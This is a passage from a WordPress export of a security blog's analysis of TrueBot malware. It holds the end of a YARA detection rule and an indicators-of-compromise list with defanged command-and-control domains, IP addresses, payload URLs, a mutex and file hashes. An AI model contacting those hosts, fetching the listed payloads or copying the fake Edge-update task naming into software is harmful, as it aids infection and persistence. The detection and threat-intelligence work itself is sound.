#448c27\">%s<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">\\\\<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #448c27\">%08x-%08x.ps1<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">&#8220;<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #4b69c6\">wide<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #4b69c6\">ascii<\/span><\/b><\/p>\n<p class=\"MsoNormal\" style=\"margin-bottom: 0cm;text-align: left;line-height: 14.25pt;background: whitesmoke;border: none;padding: 0cm\" align=\"left\"><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #333333\">\u00a0 \u00a0 \u00a0 \u00a0<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #9c5d27\">$<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #7a3e9d\">jsonip_regex<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">=<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">&#8220;<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #448c27\">*.JSONIP<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">&#8220;<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #4b69c6\">wide<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #4b69c6\">ascii<\/span><\/b><\/p>\n<p class=\"MsoNormal\" style=\"margin-bottom: 0cm;text-align: left;line-height: 14.25pt;background: whitesmoke;border: none;padding: 0cm\" align=\"left\"><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #333333\">\u00a0 \u00a0 \u00a0 \u00a0<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #9c5d27\">$<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #7a3e9d\">jsonip_path<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">=<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">&#8220;<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #448c27\">%s<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">\\\\<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #448c27\">%s.JSONIP<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">&#8220;<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #4b69c6\">wide<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #4b69c6\">ascii<\/span><\/b><\/p>\n<p class=\"MsoNormal\" style=\"margin-bottom: 0cm;text-align: left;line-height: 14.25pt;background: whitesmoke;border: none;padding: 0cm\" align=\"left\"><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #333333\">\u00a0 \u00a0 \u00a0 \u00a0<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #9c5d27\">$<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #7a3e9d\">uri<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">=<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">&#8220;<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #448c27\">\/gate.php<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">&#8220;<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #4b69c6\">wide<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #4b69c6\">ascii<\/span><\/b><\/p>\n<p class=\"MsoNormal\" style=\"margin-bottom: 0cm;text-align: left;line-height: 14.25pt;background: whitesmoke;border: none;padding: 0cm\" align=\"left\"><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #333333\">\u00a0<\/span><\/p>\n<p class=\"MsoNormal\" style=\"margin-bottom: 0cm;text-align: left;line-height: 14.25pt;background: whitesmoke;border: none;padding: 0cm\" align=\"left\"><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #333333\">\u00a0 \u00a0 \u00a0 \u00a0<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #9c5d27\">$<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #7a3e9d\">schedtask_name1<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">=<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">\/<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #4b69c6\">MicrosoftEdgeUpdateTaskMachineCore<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">\\{[<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #9c5d27\">A-Fa-f0-9<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">\\-]+\\}\/<\/span><\/b><\/p>\n<p class=\"MsoNormal\" style=\"margin-bottom: 0cm;text-align: left;line-height: 14.25pt;background: whitesmoke;border: none;padding: 0cm\" align=\"left\"><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #333333\">\u00a0 \u00a0<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #4b69c6\">condition<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #333333\">:<\/span><\/b><\/p>\n<p class=\"MsoNormal\" style=\"margin-bottom: 0cm;text-align: left;line-height: 14.25pt;background: whitesmoke;border: none;padding: 0cm\" align=\"left\"><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #333333\">\u00a0 \u00a0 \u00a0 \u00a0<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #aa3731\">uint16<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #333333\">(<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #9c5d27\">0<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #333333\">) <\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">==<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #9c5d27\">0x5A4D<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">and<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #9c5d27\">any<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #4b69c6\">of<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #9c5d27\">them<\/span><\/b><\/p>\n<p class=\"MsoNormal\" style=\"margin-bottom: 0cm;text-align: left;line-height: 14.25pt;background: whitesmoke;border: none;padding: 0cm\" align=\"left\"><span style=\"font-size: 10.5pt;color: #777777\">}<\/span><\/p>\n\n<\/div>\n<!-- \/wp:html -->\n\n<!-- wp:spacer {\"height\":\"64px\"} -->\n<div class=\"wp-block-spacer\" style=\"height: 64px\" aria-hidden=\"true\"><\/div>\n<!-- \/wp:spacer -->\n\n<!-- wp:heading {\"textAlign\":\"center\"} -->\n<h2 class=\"wp-block-heading has-text-align-center\">Indicators of Compromise (IOCs)<\/h2>\n<!-- \/wp:heading -->\n\n<!-- wp:paragraph -->\nThe following indicators of compromise were extracted from the analysis carried out:\n<!-- \/wp:paragraph -->\n\n<!-- wp:paragraph -->\n<strong>Domains<\/strong>\n<!-- \/wp:paragraph -->\n\n<!-- wp:list -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul><!-- wp:list-item --><\/ul>\n<\/li>\n<\/ul>\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>droogggdhfhf[.]com<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- \/wp:list -->\n\n<!-- wp:paragraph -->\n\n<strong>IP<\/strong>\n\n<!-- \/wp:paragraph -->\n\n<!-- wp:list -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul><!-- wp:list-item --><\/ul>\n<\/li>\n<\/ul>\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>62[.]204[.]41[.]69<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>92[.]118[.]36[.]236<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- \/wp:list -->\n\n<!-- wp:paragraph -->\n\n<strong>URL<\/strong>\n\n<!-- \/wp:paragraph -->\n\n<!-- wp:list -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul><!-- wp:list-item --><\/ul>\n<\/li>\n<\/ul>\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>hxxp:\/\/62[.]204[.]41[.]69\/dll.png<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>hxxp:\/\/62[.]204[.]41[.]69\/ldn.dll<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>hxxp:\/\/droogggdhfhf[.]com\/gate.php<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- \/wp:list -->\n\n<!-- wp:paragraph -->\n\n<strong>Mutex<\/strong>\n\n<!-- \/wp:paragraph -->\n\n<!-- wp:list -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul><!-- wp:list-item --><\/ul>\n<\/li>\n<\/ul>\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>(u3qkfewi3ujrk32lqpti32ofwq<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- \/wp:list -->\n\n<!-- wp:paragraph -->\n\n<strong>Hash<\/strong>\n\n<!-- \/wp:paragraph -->\n\n<!-- wp:list -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul><!-- wp:list-item --><\/ul>\n<\/li>\n<\/ul>\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li><strong>information_7_apr-4753978.js:<\/strong> 8A2AA35F1E8E8186A0F4A6684D3CAB54E093914B2DBA38F59D5D01C6EE6AAF04<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li><strong>NoSleep.dll:<\/strong> b803db527f146f0d356700e24836a2e888f74c3dd2196a99f73caa0e57007f34<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- \/wp:list -->\n\n<!-- wp:paragraph -->\n<strong>Hashes identified using the Yara rule<\/strong>\n<!-- \/wp:paragraph -->\n\n<!-- wp:list -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul><!-- wp:list-item --><\/ul>\n<\/li>\n<\/ul>\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>594ade1fb42e93e64afc96f13824b3dbd942a2cdbc877a7006c248a38425bbc1<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>47f962063b42de277cd8d22550ae47b1787a39aa6f537c5408a59b5b76ed0464<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>ff8c8c8bfba5f2ba2f8003255949678df209dbff95e16f2f3c338cfa0fd1b885<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>c042ad2947caf4449295a51f9d640d722b5a6ec6957523ebf68cddb87ef3545c<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>0e3a14638456f4451fe8d76fdc04e591fba942c2f16da31857ca66293a58a4c3<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>1285aa7e6ee729be808c46c069e30a9ee9ce34287151076ba81a0bea0508ff7e<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>2c8d58f439c708c28ac4ad4a0e9f93046cf076fc6e5ab1088e8943c0909acbc4<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>97bae3587f1d2fd35f24eb214b9dd6eed95744bed62468d998c7ef55ff8726d4<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>80b9c5ec798e7bbd71bbdfffab11653f36a7a30e51de3a72c5213eafe65965d9<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>22e3f4602a258e92a0b8deb5a2bd69c67f4ac3ca67362a745178848a9da7a3cc<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>ed38c454575879c2546e5fccace0b16a701c403dfe3c3833730d23b32e41f2fe<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>7c607eca4005ba6415e09135ef38033bb0b0e0ff3e46d60253fc420af7519347<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>b95a764820e918f42b664f3c9a96141e2d7d7d228da0edf151617fabdd9166cf<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>97d0844ce9928e32b11706e06bf2c4426204d998cb39964dd3c3de6c5223fff0<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>8d8a0e751c5bcc4169e0e7bc6593764c67b3c97d6511563525bed7bac3786b15<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>68a86858b4638b43d63e8e2aaec15a9ebd8fc14d460dd74463db42e59c4c6f89<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>2d50b03a92445ba53ae147d0b97c494858c86a56fe037c44bc0edabb902420f7<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>e9a56ff888e9377394a45c97d168adc7774a36bf7f0160fe0b305cc23dabebf4<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>bf3c7f0ba324c96c9a9bff6cf21650a4b78edbc0076c68a9a125ebcba0e523c9<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>a69400c59c9d523d9c0548e2c1cb27ebcc4fa04b512d6fb7b9917b8ab3e00844<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>172e9ae8c25df7eae916bafccc8d11615317c3144a77a0d106f672dd7d62c1f5<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>40e1e6bbfd567fe6a1eb826667966cade58522718c96ddea5c6c4804de26c800<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>c713b48fc5335c1659c6e38e2b5ed304a4425ccde4c8c7706dbcce40cb8f02e2<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>6210a9f5a5e1dc27e68ecd61c092d2667609e318a95b5dade3c28f5634a89727<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>3160c6e4384affbd13179a5299fa2e1c39a5c777c696eba41d360b8377db0e10<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>fea48868a14f4b275a5e6a4a26b69e874b5ac7bdf4c65bcb1299db3f0cb44d46<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>c3b3640ddf53b26f4ebd4eedf929540edb452c413ca54d0d21cc405c7263f490<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>72813522a065e106ac10aa96e835c47aa9f34e981db20fa46a8f36c4543bb85d<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>1ef8cdbd3773bd82e5be25d4ba61e5e59371c6331726842107c0f1eb7d4d1f49<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>092910024190a2521f21658be849c4ac9ae6fa4d5f2ecd44c9055cc353a26875<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>7e39dcd15307e7de862b9b42bf556f2836bf7916faab0604a052c82c19e306ca<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>7a64bc69b60e3cd3fd00d4424b411394465640f499e56563447fe70579ccdd00<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>c3743a8c944f5c9b17528418bf49b153b978946838f56e5fca0a3f6914bee887<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>7c79ec3f5c1a280ffdf19d0000b4bfe458a3b9380c152c1e130a89de3fe04b63<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- \/wp:list -->","protected":false},"excerpt":{"rendered":"<p>After recent online publications regarding the TrueBot malware (VMware, Bleeping and THN), we have decided to contributing with our analysis of this potential new threat. At the end, you will find the indicators of compromise and a Yara rule to identify it. Before starting with the technical analysis of the malware, we believe it is [&hellip;]<\/p>\n","protected":false},"author":12,"featured_media":6562,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2483],"tags":[213],"class_list":["post-6991","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-malware-analysis","tag-malware-analysis"],"_links":{"self":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/6991","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/users\/12"}],"replies":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/comments?post=6991"}],"version-history":[{"count":7,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/6991\/revisions"}],"predecessor-version":[{"id":7042,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/6991\/revisions\/7042"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media\/6562"}],"wp:attachment":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media?parent=6991"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/categories?post=6991"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/tags?post=6991"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}